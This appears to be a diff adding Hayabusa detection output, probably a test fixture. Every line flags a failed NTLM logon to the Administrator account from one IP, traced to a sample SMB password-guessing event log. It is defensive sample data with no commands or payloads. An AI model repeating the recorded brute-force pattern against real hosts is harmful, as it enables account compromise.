+2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bl0d61v2Ux7cNv4r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8LxTa5lyutrIB2cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LPCy11e3YxcCloSH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mj07WKc4aQqPC0Te  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T2M3v4TsQul5R4sj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I67uBcH52tgLzhVB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hsth68FDJ4F10H6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDoHrfWlaWZ5GbWV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uliC5Wd7uZR3fIBc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: Xhg4hg4XDFaXsJRe  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: ZrSGxwUyV6gCUPeb  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUBgTr05x3djEYdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 40PhGU4ZXu7uihop  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1DJ9r72hXZH9rEkb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: khy2BeyBb9wq00f7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1cDckicL7IMrO7OQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEEkvfVd3FCap6fa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGFSyHQ0ZNWofxzE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItOZqZSDTrdWpkbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhNdf5lHfrHKSCXq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg05F6tdf3kR9kdP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 70rRbaC6L6SzT15q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnJyN8wF21ff2L1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MUZHZJMQznj6GBqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9h52ZKMbXLuFvUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n95RJvcQnFrAG2iX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xI23nmysFlr1pvVf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nVsjcTxDdZbzkmMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMuWatQuNBh9UKdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfC3JZ3awqFDNQbm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 337h8PHN6Axi0iaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qGQpWOuzgETfxTgJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oFjlyMAJMI2zIC8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7exAVz3PlzJQ6Wcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RuYihjQpt76foAW3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlPm2vRh9EHN9J6n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n9jDy3NDDPe7XgyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtGxqEKOoP6W3w0Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BLqYztXwV80UBez1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0yki1dEFZrnMLs2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jbE2z1W1wQgoTDso  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJmZFXFxiLuWWkMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x9EPwprgXSJNUFfg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h0ZjYxZ8K5m5F1vo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xSw7OjDv8ldqbm5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mk0BAdOI210HwPhX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSwWz57Kvl2XJVUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DLcfSrHT5bSsNnuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQDkbESps0PXWEUT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpnyzkXasuyAtdn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ps9IqJzTliJvzpIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V7PLb2uRTIY8t123  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sHAJ9p0QbSRxhvtk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YRiE1wGrwWAx0feP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Flo4bCVjmlaHz0QS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HscUujSzd3Ua7dqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aIQPTx67aEer51wb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MqUoXUf7PKIaoDjs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzeB4DAS1W633tmh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTtXTrqHoCZMbDLT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4HVv5PgPhiDW3qcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g21VoO45UrIbTuZO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGpD7AJUTekDmd6Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OykzTOn7B9THv0cT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cIYOrBBwX8nFpCzw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SvnROHLMVnmPfAyy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5EwJ84H7kXQXzGZz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34RLeLWDgLayU3JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QaXHGUgboODAi5Qu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlOlZ0m397CsmaeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N24rSPCI8DsQIPXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5y2tgoUcs6mFPZm4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
